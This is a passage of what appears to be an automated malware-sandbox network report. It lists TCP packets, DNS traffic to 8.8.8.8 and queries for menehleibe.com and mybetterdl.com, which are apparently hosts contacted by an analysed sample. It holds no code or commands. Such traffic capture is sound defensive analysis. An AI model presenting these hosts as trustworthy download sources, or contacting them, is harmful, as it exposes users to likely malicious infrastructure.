                                                                                                                                                                      Sep 14, 2021 16:03:24.626216888 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.626234055 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.626279116 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.627393961 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.627449989 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.627466917 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.627510071 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.628633022 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.628691912 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.628709078 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.628748894 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.629883051 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.629935980 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.629949093 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.629988909 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.631141901 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.631208897 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.631228924 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.631279945 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.632368088 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.632425070 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.632438898 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.632483006 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.633655071 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.633743048 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.633760929 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.633807898 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.635004044 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.635091066 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.635108948 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.635159016 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.636179924 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.636229038 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.636245012 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.636290073 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.637376070 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.637440920 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.637443066 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.637460947 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.637506962 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.637548923 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.638647079 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.638740063 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.638750076 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.638816118 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.639766932 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.639852047 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.639861107 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.639909983 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.640907049 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.640996933 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.641005039 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.641062021 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.642021894 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.642118931 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.642126083 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.642174006 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.643106937 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.643198013 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.643208981 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.643291950 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.644175053 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.644366980 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.644376993 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.644423962 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.644804955 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.644872904 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.644875050 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.644891024 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.644932985 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.644974947 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.645792007 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.645859957 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.645870924 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.645883083 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.645908117 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.645951986 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.646764994 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.646831036 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.646843910 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.646856070 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.646883965 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.646958113 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.647752047 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.647823095 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.647825956 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.647838116 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.647871971 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.647929907 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.648680925 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.648749113 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.648760080 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.648768902 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.648798943 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.648844004 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.649668932 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.649738073 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.649754047 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.649763107 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.649811983 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651834965 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651896000 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651906013 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651942015 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651949883 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651956081 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651993036 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651998997 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652043104 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.652074099 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652121067 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.652127028 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652215958 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.652225018 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652394056 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653045893 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653104067 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653112888 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653142929 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653155088 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653162956 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653182030 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653242111 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653879881 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653954029 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653981924 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653990984 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.654010057 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.654033899 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.654748917 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.654809952 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.654819012 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.654860973 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.658924103 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.659065962 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.659141064 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.670753002 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.670795918 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.670870066 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.671591043 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.671602964 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.727396011 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.727478027 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.728662968 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.728681087 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.731370926 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.731390953 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.759036064 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.759085894 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.759181976 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.759973049 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.759988070 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789594889 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789659023 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789669991 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789697886 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789715052 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789747000 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789761066 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789772987 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789798021 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789835930 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789844990 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789891958 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.791244984 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.791326046 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.791347027 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.791407108 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.793066978 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.793140888 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.793164015 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.793216944 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.794904947 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.794997931 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.795020103 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.795085907 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.795708895 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.796175957 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.796272039 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.816658974 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.816756964 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.817169905 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.817178965 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.820198059 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.820221901 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.856297970 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.856349945 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.856420994 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.857116938 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.857141972 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.882395983 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.882474899 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.882502079 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.882551908 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.885431051 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.885555029 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.885623932 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.914119005 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.914190054 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.921106100 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.921154976 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.924014091 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.924051046 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.975816965 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.976684093 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.976711035 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.976773024 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.979940891 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.980214119 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.981053114 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:25.017545938 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:25.120173931 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:25.330677986 CEST4973880192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:25.331146002 CEST4974780192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:25.331173897 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:25.331183910 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:25.331199884 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:25.331204891 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:25.331213951 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:25.333533049 CEST4975080192.168.2.6142.250.102.106

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Sep 14, 2021 16:02:41.352334023 CEST5507453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:02:41.382185936 CEST53550748.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:12.456141949 CEST5451353192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:12.483231068 CEST53545138.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:17.626017094 CEST6204453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:17.659617901 CEST53620448.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:19.723831892 CEST6379153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:19.756581068 CEST53637918.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:21.819623947 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:21.848687887 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:22.631850958 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:22.679900885 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:23.476247072 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:23.514079094 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.063437939 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:24.098937035 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.214965105 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:24.244478941 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.691652060 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:24.718938112 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:31.354084969 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:31.381381989 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:31.936877012 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:31.974136114 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:32.774014950 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:32.802583933 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:33.456876040 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:33.512201071 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:33.832693100 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:33.869004011 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:34.882792950 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:34.911484003 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:35.330614090 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:35.361411095 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:35.818566084 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:35.845401049 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:37.120443106 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:37.147418022 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:39.126331091 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:39.167191029 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:40.212603092 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:40.239373922 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:47.589806080 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:47.659252882 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:48.264544010 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:48.296758890 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:48.322751045 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:48.324810028 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:48.591943979 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:48.631686926 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:49.635165930 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:49.663881063 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:50.938179016 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:50.980142117 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:51.681217909 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:51.719065905 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:55.699737072 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:03:55.729726076 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:04:09.371015072 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:04:09.435826063 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:04:28.190947056 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:04:28.229515076 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:04:30.006293058 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                                      Sep 14, 2021 16:04:30.052378893 CEST53621168.8.8.8192.168.2.6

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Sep 14, 2021 16:03:19.723831892 CEST192.168.2.68.8.8.80x9451Standard query (0)menehleibe.comA (IP address)IN (0x0001)
                                                                                                                                                                      Sep 14, 2021 16:03:21.819623947 CEST192.168.2.68.8.8.80x1065Standard query (0)mybetterdl.comA (IP address)IN (0x0001)
